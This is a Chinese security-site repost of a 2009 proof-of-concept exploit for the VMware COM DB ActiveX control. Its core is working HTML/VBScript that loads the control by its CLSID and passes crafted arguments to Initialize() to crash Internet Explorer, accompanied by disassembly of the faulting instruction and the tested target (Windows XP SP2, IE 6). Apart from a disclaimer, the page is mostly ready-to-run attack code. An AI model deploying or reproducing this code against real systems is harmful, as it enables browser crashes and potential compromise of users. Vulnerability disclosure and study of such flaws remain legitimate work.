首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
VMware COM DB ActiveX Remote Buffer Overflow Exploit
来源:www.vfcocus.net 作者:cN4phux 发布时间:2009-01-09  

<html>
<!--
                    << Bug discovered by cN4phux >>     a small GHH from DZ.
# VMware COM DB ActiveX Remote Buffer Overflow Exploit
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
# Tested on Windows XP Professional SP2, with Internet Explorer 6.x.x
 CLSID  = '8F5DEA70-D1E7-4237-BCDB-D3D56ED3E6FA'
 progID    =  "VMDBCOMLib.VMList"
 member_name = "Initialize"
 Target_File = "C:\Program Files\VMware\VMware Server\vmdbCOM.dll"
#
# Function that is vulnerable with a DOS IE  . . Initialize()
#  Block Disassembly:
    111AE667 RETN
    111AE668 MOV EAX,[EBP+C]
    111AE66B PUSH EBX
    111AE66C PUSH EDI
    111AE66D PUSH EAX
    111AE66E MOV [ESI+4],EAX
    111AE671 CALL [EAX]   <-------------------- it will be crash here . . .<
    111AE673 MOV EBX,[EBP+8]
    111AE676 PUSH 1133D9D0
    111AE67B PUSH EBX
    111AE67C CALL 111AF800
    111AE681 MOV EDI,EAX
    111AE683 ADD ESP,C
    111AE686 TEST EDI,EDI
    111AE688 JL 111AE731

  Exception Code: ACCESS_VIOLATION
  Disasm: 111AE671 CALL [EAX] (vmapplib.DLL)

# Greetz to friend's : Blub, Zigma, Heurs, djug & etc . . .
-->

<object classid='clsid:8F5DEA70-D1E7-4237-BCDB-D3D56ED3E6FA'
id='VMware_function'></object>
<input language=VBScript onclick=Buffer_Act() type=button value='Click here
to start the crash DOS'>
<script language='vbscript'>
 Sub Buffer_Act
  buff_1 = -2147483647
  buff_2 = 1
  buff_3 = unescape("%90")
  VMware_function.Initialize buff_1, buff_2
 End Sub
</script>
</html>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Virgilio Toolbar Toolbar Activ
·IE Denial of Service Exploit (
·IntelliTamper (2.07/2.08) Lang
·以色列人发现的IE 0day
·Anope IRC Services With bs_fan
·XOOPS 2.3.2 (mydirname) Remote
·MP3 TrackMaker 1.5 (.mp3 File)
·Pizzis CMS <= 1.5.1 (visualizz
·VUPlayer 2.49 .ASX File (HREF)
·GOM Player 2.0.12.3375 (.ASX F
·MS Internet Explorer JavaScrip
·CuteNews <= 1.4.6 (ip ban) XSS
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved